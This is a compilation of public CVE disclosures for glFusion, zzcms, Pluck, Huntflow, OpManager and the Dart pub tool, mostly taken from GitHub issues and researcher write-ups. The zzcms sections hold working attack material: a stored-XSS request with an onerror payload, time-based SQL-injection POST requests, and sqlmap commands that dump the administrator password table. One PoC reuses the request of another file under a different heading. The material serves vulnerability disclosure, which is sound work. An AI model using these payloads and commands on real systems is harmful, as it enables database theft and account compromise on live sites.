glFusion CMS 1.7.9 is affected by an access control vulnerability via /public_html/users.php.

Incidentally, it's worth mentioning that the lockout is based on failed attempts from an IP address, not by user name. So the valid user could still log into the site. Unless they're sharing a public IP with the attacker, of course.

…

On Thu, Dec 9, 2021 at 9:43 AM Lee Garner \*\*\*@\*\*\*.\*\*\*> wrote: Currently the full name (could be a nickname) is shown along with the username. I don't think it would hurt to show only the fullname, if available, otherwise the user name. Creating a "nickname" field is interesting, but I suspect most users will leave it blank if allowed, or use their login names for it as well. On Thu, Dec 9, 2021 at 2:12 AM Topsec\_bunney \*\*\*@\*\*\*.\*\*\*> wrote: > We can get username on this link: > > http://192.168.255.130/glfusion1.7.9/public\_html/users.php?mode=profile&uid=3 > \[image: firefox\_fIwf2EDlUU\] > <https://user-images.githubusercontent.com/73220685/145376552-976aae00-0893-44b7-ac14-0c1e7de9233f.png\> > > So, attacker can get all username . > > Then they can always log in to all users with the wrong password, which > will prevent all users from logging in to the website normally. > > \[image: firefox\_LrrbnCvHFd\] > <https://user-images.githubusercontent.com/73220685/145376725-bde27dbe-c667-4ba4-8cf4-4b5f99998885.png\> > > There are two solutions: > > 1. > > set the verification code on the login page > 2. > > The second is to display the user's nickname instead of the login name > > — > You are receiving this because you are subscribed to this thread. > Reply to this email directly, view it on GitHub > <#487\>, or unsubscribe > <https://github.com/notifications/unsubscribe-auth/ABYLFOJM34JDJPZKT6FGA4TUQB6JPANCNFSM5JWB3F2Q\> > . > Triage notifications on the go with GitHub Mobile for iOS > <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675\> > or Android > <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm\_campaign%3Dnotification-email%26utm\_medium%3Demail%26utm\_source%3Dgithub\>. > >

CVE-2021-44949: glFusion CMS 1.7.9 user Login denied vulnerability · Issue #487 · glFusion/glfusion

glFusion CMS v1.7.9 is affected by an arbitrary user registration vulnerability in /public_html/users.php. An attacker can register with the mailbox of any user. When users want to register, they will find that the mailbox has been occupied.

That's true, but I'm not sure now much of a problem it is. If the malicious user uses a valid email address, the activation email will be sent to the real email account holder. If the submission queue is used, the email is sent upon approval. If the user submission is rejected, the record is deleted and available for re-registration. I suppose it wouldn't hurt to send an email to the new user even if queued, saying "your account is pending approval"

…

On Wed, Dec 8, 2021 at 10:18 PM Topsec\_bunney \*\*\*@\*\*\*.\*\*\*> wrote: \*\*There is a logical problem with the user registration page After clicking the register button, the user does not need to confirm the email. The system directly saves the submitted content in the database. This leads to a problem. An attacker can register with the mailbox of any user. When users want to register, they will find that the mailbox has been occupied.\*\* \[image: firefox\_0LibhucPYT\] <https://user-images.githubusercontent.com/73220685/145344346-91dbbce9-01c4-4fad-8a78-b070c9959766.png\> — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#485\>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ABYLFOKDJWVDPQVG2YPTBB3UQBCZ5ANCNFSM5JVTDREQ\> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675\> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm\_campaign%3Dnotification-email%26utm\_medium%3Demail%26utm\_source%3Dgithub\>.

CVE-2021-44937: glFusion CMS 1.7.9 Arbitrary user registration vulnerability · Issue #485 · glFusion/glfusion

Cross Site Scripting (XSS) vulnerability exists in zzcms 2019 XSS via a modify action in user/adv.php.

**/user/adv.php**

Edition: zzcms2019 /user/adv.php

**0x01 Vulnerability**

Get the `modify` parameter with the `request` method

    if ($action=="modify"){
        checkstr($img,"upload");//入库前查上传文件地址是否合格
        checkstr($oldimg,"upload");//入库前查上传文件地址是否合格
        query("update zzcms_textadv set adv='$adv',company='$company',advlink='$advlink',img='$img',passed=0 where username='".$_COOKIE["UserName"]."'");
    

Which is called vulnerable parameter `$img`

Enter the `checkstr($img,"upload");` function

    function checkstr($str,$kind,$msg='',$back_url='back'){
        if ($str<>''){
            switch ($kind){
            ...
            case "upload";//用于引用网络图片地址和视频地址的上传页
            	if (strpos("gif|jpg|peg|png|bmp|flv|swf",strtolower(substr($str,-3)))===false){
            	showmsg($msg.$str."不支持的上传文件格式。支持的文件格式为（gif|jpg|png|bmp|flv|swf）",$back_url);
            	}
            	if (substr($str,0,4)<>"http" && $str<>"/image/nopic.gif"){
            		if (strpos($str,'/uploadfiles')===false){
            		showmsg($msg.$str."不支持的上传文件地址",$back_url);
            		}
            	}
            break;	
            }
        }
    }
    

This function only judges the suffix name and the first four bits. So we can construct payload.

    http:' onerror=alert(1) alt='1.jpg
    

In this way, the detection of functions can be bypassed.

Although the global filter file is also loaded.`/inc/stopsqlin.php`

    function zc_check($string){
    	if(!is_array($string)){
    		if(get_magic_quotes_gpc()){
    	 	return htmlspecialchars(trim($string));
    		}else{
    		return addslashes(htmlspecialchars(trim($string)));
    		}
    	 }
    	foreach($string as $k => $v) $string[$k] = zc_check($v);
    	return $string;
    }
    	
    if($_REQUEST){
    	$_POST =zc_check($_POST);
    	$_GET =zc_check($_GET);
    	$_COOKIE =zc_check($_COOKIE);
    	@extract($_POST);
    	@extract($_GET);	
    }
    

`htmlspecialchars` function does not escape single quotes by default.

So you can't defend against single quotation closure.

The complete package is as follows.

    POST /user/adv.php?action=modify HTTP/1.1
    Host: www.testzzcms.com
    Content-Length: 200
    Cache-Control: max-age=0
    Origin: http://www.testzzcms.com
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://www.testzzcms.com/user/adv.php
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; bdshare_firstime=1555068916100; PHPSESSID=70imo2hba2vg0b12n65rngv277; UserName=testxss; PassWord=19a811d71d1df1dd8ef14374949b4409; __tins__713776=%7B%22sid%22%3A%201556018030370%2C%20%22vd%22%3A%205%2C%20%22expires%22%3A%201556019863811%7D; __51cke__=; __51laig__=10
    Connection: close
    
    adv=%E6%B5%8B%E8%AF%95&advlink=%2Fzt%2Fshow-1.htm&company=%E6%B5%8B%E8%AF%95&oldimg=%2Fuploadfiles%2F2019-04%2F20190423195439950.jpg&img=http:1' onerror=alert(/xss/) alt='1.jpg&Submit22=%E4%BF%AE%E6%94%B9
    

When Administrators Access Advertisements -->Advertisements Users Apply for

![](https://github.com/zzb1999/CVE/raw/master/zzcms/image/xss001.png)

He/She will be see a alert window which said /xss/

![](https://github.com/zzb1999/CVE/raw/master/zzcms/image/xss002.png)

![](https://github.com/zzb1999/CVE/raw/master/zzcms/image/xss003.jpg)

CVE-2020-19042: CVE/XSS.md at master · zzb1999/CVE

Missing SSL Certificate Validation issue exists in Pluck 4.7.15 in update_applet.php, which could lead to man-in-the-middle attacks.

**Issue Summary**  
Pluck's update system deliberately skips SSL certificate validation.

**Detailed Description**  
Within update\_applet.php is the following code:

    		// Dont check ssl certifical
    		curl_setopt($geturl, CURLOPT_SSL_VERIFYPEER, false);
    

This ensures peer SSL certificates are never valdiated.

**Impact**  
In theory, this vulnerability can make the Pluck's update system susceptible to Man-in-the-middle attacks.

CVE-2021-31747: Pluck 4.7.15 - Missing SSL Certificate Validation in update_applet.php · Issue #101 · pluck-cms/pluck

Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.

CVE-2021-37934 ------------------------------------------ Insufficient server-side login-attempt limit ------------------------------------------ \[Suggested description\] Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing. ------------------------------------------ \[Additional Information\] Example login request to /account/login: POST /account/login HTTP/1.1 Host: hf.mydomain Connection: close Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://hf.mydomain Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://hf.mydomain/account/login Accept-Encoding: gzip, deflate Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: lang=ru\_RU; \_xsrf=2|b65eb986|309cc18c34ff994a04ca856397c5f300|1619468100; token=5kafeoqj6vk2tb3mmx31wyl8zvc1ti7mtfpkretj2k38qgdaddl5wl07yz0tjiwm; \_xsrf=2%7Cb65eb986%7C309cc18c34ff994a04ca856397c5f300%7C1619468100&email=user123&password=p@ssw0rd There is no any server-side login-attempt limit and attacker can perform multiple login attempts for brute-force password guessing. ------------------------------------------ \[VulnerabilityType Other\] CWE-307: Improper Restriction of Excessive Authentication Attempts ------------------------------------------ \[Vendor of Product\] Huntflow ------------------------------------------ \[Affected Product Code Base\] Huntflow Enterprise - Affected < 3.10.14. Fixed at 3.10.14. Tested at 3.6.1 ------------------------------------------ \[Affected Component\] "/account/login" HTTP method ------------------------------------------ \[Attack Type\] Remote - unauthenticated users ------------------------------------------ \[CVE Impact\] Brute-force password attacks ------------------------------------------ \[Attack Vectors\] To exploit send multiple login attempts to the Huntflow Enterprise "/account/login" HTTP method ------------------------------------------ \[Reference\] https://huntflow.ru https://gist.github.com/andrey-lomtev/4ec9004101152ea9d0043a09d59498a6 ------------------------------------------ \[Has vendor confirmed or acknowledged the vulnerability?\] true ------------------------------------------ \[Discoverer\] Andrey Lomtev ------------------------------------------ Andrey Lomtev / Infosec.ru team

CVE-2021-37934: CVE-2021-37934

OpUtils in Zoho ManageEngine OpManager 12.5 before 125490 mishandles authentication for a few audit directories.

CVE-2021-44514: Read me | OpManager Help

When using the dart pub publish command to publish a package to a third-party package server, the request would be authenticated with an oauth2 access_token that is valid for publishing on pub.dev. Using these obtained credentials, an attacker can impersonate the user on pub.dev. We recommend upgrading past https://github.com/dart-lang/sdk/commit/d787e78d21e12ec1ef712d229940b1172aafcdf8 or beyond version 2.15.0 

CVE-2021-22568: sdk/CHANGELOG.md at main · dart-lang/sdk

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, abd 2021 in dl/dl_download.php. when registering ordinary users.

**ZZCMS2021\_sqlinject\_1****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `dl/dl_download.php`

<?php
include("../inc/conn.php");
...
#line 11-21
$id\="";
$i\=0;
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $id\=$id.($\_POST\['id'\]\[$i\].',');	
	}
}else{
	$founderr\=1;
	$ErrMsg\="<li>操作失败！请先选中要下载的信息</li>";
}
$id\=substr($id,0,strlen($id)-1);//去除最后面的","
...
#line 68-72
if (strpos($id,",")>0){
$sql\="select \* from zzcms\_dl where passed=1 and id in (". $id .") order by id desc";
}else{
$sql\="select \* from zzcms\_dl where passed=1  and id='$id'";
}

Before you exploit the vulnerability, you need to visit this link to register users:

http://127.0.0.1/reg/userreg.php

When you have an account, visit this link and the POC is as follows.

POC:

    POST /dl/dl_download.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/dl/dl_download.php
    Cookie: UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827000715985.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/dl/dl\_download.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827002132182.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_download.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827003242950.png

CVE-2021-40282: ZZCMS2021 sqlinject(1)

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 in dl/dl_print.php when registering ordinary users.

**ZZCMS2021\_sqlinject\_2****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `dl/dl_print.php`

<?php
include("../inc/conn.php");
...
#line 29-40
$id\="";
$i\=0;
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $id\=$id.($\_POST\['id'\]\[$i\].',');
    }
	
}else{
	$founderr\=1;
	$ErrMsg\="<li>操作失败！请先选中要下载的信息</li>";
}
$id\=substr($id,0,strlen($id)-1);//去除最后面的","
...
#line 77-83
if (strpos($id,",")>0){
	$sql\="select \* from zzcms\_dl where passed=1 and id in (". $id .") ";
	}else{
	$sql\="select \* from zzcms\_dl where passed=1  and id=".$id." order by id desc";
}
	
$rs\=query($sql);

Before you exploit the vulnerability, you need to visit this link to register users:

http://127.0.0.1/reg/userreg.php

When you have an account, visit this link and the POC is as follows.

POC:

    POST /dl/dl_download.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/dl/dl_download.php
    Cookie: UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827005508639.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827005636669.png)

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827010301240.png)

CVE-2021-40281: ZZCMS2021 sqlinject(2)

An SQL Injection vulnerablitly exits in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/dl_sendmail.php.

**ZZCMS2021\_sqlinject\_4****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `admin/dl_sendmail.php`

<?php 
include("admin.php");
...
#line 17-38
include("../inc/mail\_class.php");
checkadminisdo("dl");
$id\="";
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $ids\=$\_POST\['id'\]\[$i\];
	$ids\=explode("|",$ids);
	//$id=$ids\[0\];
	$id\=$id.($ids\[0\].',');
	}
	$id\=substr($id,0,strlen($id)-1);//去除最后面的","
}else{
echo "<script lanage='javascript'>alert('操作失败！至少要选中一条信息。');window.opener=null;window.open('','\_self');window.close()</script>";
exit;
}

if (strpos($id,",")>0){
$sql\="select \* from zzcms\_dl where saver<>'' and id in (". $id .")";//没有接收人的，非留言类代理不用发提示邮件。
}else{
$sql\="select \* from zzcms\_dl where saver<>'' and id='".$id."'";
}
$rs\=query($sql);

**Before you exploit this vulnerability, you need to find a way to obtain the permission of background administrator**

After you obtain the administrator user rights and log in, visit the following link to exploit the vulnerability:

http://yourhost/admin/dl\_sendmail.php

POC:

    POST /admin/dl_sendmail.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/admin/dl_sendmail.php
    Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(5)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827014436700.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/admin/dl\_sendmail.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --flush-session --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827014910309.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/admin/dl\_sendmail.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827015328234.png

Tag

#apple